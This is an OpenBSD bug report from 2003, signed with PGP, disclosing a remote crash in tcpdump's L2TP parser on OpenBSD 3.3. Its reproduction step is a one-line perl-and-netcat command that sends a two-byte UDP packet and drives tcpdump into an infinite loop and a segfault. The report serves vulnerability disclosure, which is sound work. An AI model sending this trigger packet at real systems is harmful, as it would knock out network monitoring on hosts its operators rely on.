-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------- Original Message -------- Subject: user/3610: repetable tcpdump remote crash Resent-Date: Sat, 20 Dec 2003 08:55:02 -0700 (MST) Resent-From: gnats@cvs.openbsd.org (GNATS Filer) Resent-To: bugs@cvs.openbsd.org Date: Sat, 20 Dec 2003 16:42:25 +0100 (CET) From: venglin@freebsd.lublin.pl Reply-To: venglin@freebsd.lublin.pl To: gnats@openbsd.org >Number: 3610 >Category: user >Synopsis: repetable tcpdump remote crash >Confidential: yes >Severity: critical >Priority: high >Responsible: bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: net >Arrival-Date: Sat Dec 20 15:50:02 GMT 2003 >Closed-Date: >Last-Modified: >Originator: Przemyslaw Frasunek >Release: 3.3-RELEASE >Organization: net >Environment: System : OpenBSD 3.3 Architecture: OpenBSD.i386 Machine : i386 >Description: Sending a packet containg 0xff,0x02 bytes to port 1701/udp causes a L2TP protocol parser in tcpdump to enter an infinite loop, eating all available memory and then segfaulting. This bug also affects tcpdump in -CURRENT. >How-To-Repeat: tcpdump -i lo0 -n udp and dst port 1701 & perl -e 'print "\xff\x02"' | nc -u localhost 1701 >Fix: Unknown, recent versions of tcpdump are immune to this problem. >Release-Note: >Audit-Trail: >Unformatted: - -- * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NICHDL: PMF9-RIPE * * JID: venglin@jabber.atman.pl ** PGP ID: 2578FCAD ** HAM-RADIO: SQ8JIV * -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQE/5HfykxEnBiV4/K0RApAkAKDMw3qheVAkGu3v2EvoCoq07C8ZYgCgh9sl ZjwiNzK9di8oSMQ1XK/YF+g= =Q0AT -----END PGP SIGNATURE-----
